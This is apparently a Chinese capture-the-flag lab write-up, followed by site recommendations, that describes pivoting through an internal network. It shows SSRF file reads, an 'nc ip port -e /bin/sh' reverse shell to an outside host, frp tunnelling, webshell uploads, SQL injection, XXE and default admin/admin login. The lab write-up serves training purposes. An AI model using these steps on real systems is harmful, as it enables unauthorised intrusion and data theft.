首先ssrf读取文件url=file:///flag ,拿到flag
探测内网主机
在这里插入图片描述1 2 10 138 250 的主机
在这里插入图片描述
读取/etc/hosts, /proc/net/arp, 拿到内网信息
扫描内网端口,提示192.168.0.10网站被黑,可能存有shell.php
在这里插入图片描述利用这个去执行命令反弹shell
测试可以出网
在这里插入图片描述测试命令发现对面不支持bash,可以用sh -c执行命令
在这里插入图片描述nc ip port -e /bin/sh 反弹成功
在这里插入图片描述将frp传到内网
vps开启服务./frps -c ./frps.ini,目标上执行./frpc -c ./frpc.ini
在这里插入图片描述proxifier配置代理,ip是公网服务器ip,端口是frpc.ini中的remote_port
在这里插入图片描述此时本地访问192.168.0.10/shell.php即可访问到目标内网的shell.php
在这里插入图片描述
在目标写入一句话,蚁剑连接
在这里插入图片描述192.168.0.138SQL注入
在这里插入图片描述192.168.0.250存在xxe,读取/flag和/var/www/html/flag
在这里插入图片描述在这里插入图片描述在192.168.0.10里还发发现10.10.0.22
在这里插入图片描述
访问10.10.0.22,加上admin.php,进入后台,输入admin、admin登录
在这里插入图片描述文件夹管理上传shell,点击拿到路径
在这里插入图片描述连接蚁剑
在这里插入图片描述拿到网站根目录和根目录下的两个flag
在这里插入图片描述
在这里插入图片描述

# web安全 # 网络安全
Logo
技术共进,成长同行——讯飞AI开发者社区

技术共进,成长同行——讯飞AI开发者社区

更多推荐

cover

AI智能体第4期——深入了解人工智能智能体的不同类型:反应式、规划式等

avatar 讯飞AI开发者社区
cover

人工智能和数据科学就业市场:到底发生了什么?

avatar 讯飞AI开发者社区

深度解读 RTX 4090:算力爆发下的应用场景与未来趋势

随着人工智能、大数据与高性能计算的需求不断增长,硬件设备的算力已经成为推动整个科技行业进步的关键引擎。近年来,NVIDIA 的显卡在 AI、渲染、科研和游戏领域都有着举足轻重的地位。其中,作为 40 系列的旗舰产品,不仅刷新了游戏性能的天花板,更在算力层面展现出前所未有的强大能力。本文将从多个角度深入解析 RTX 4090 的算力应用与价值。

avatar 讯飞AI开发者社区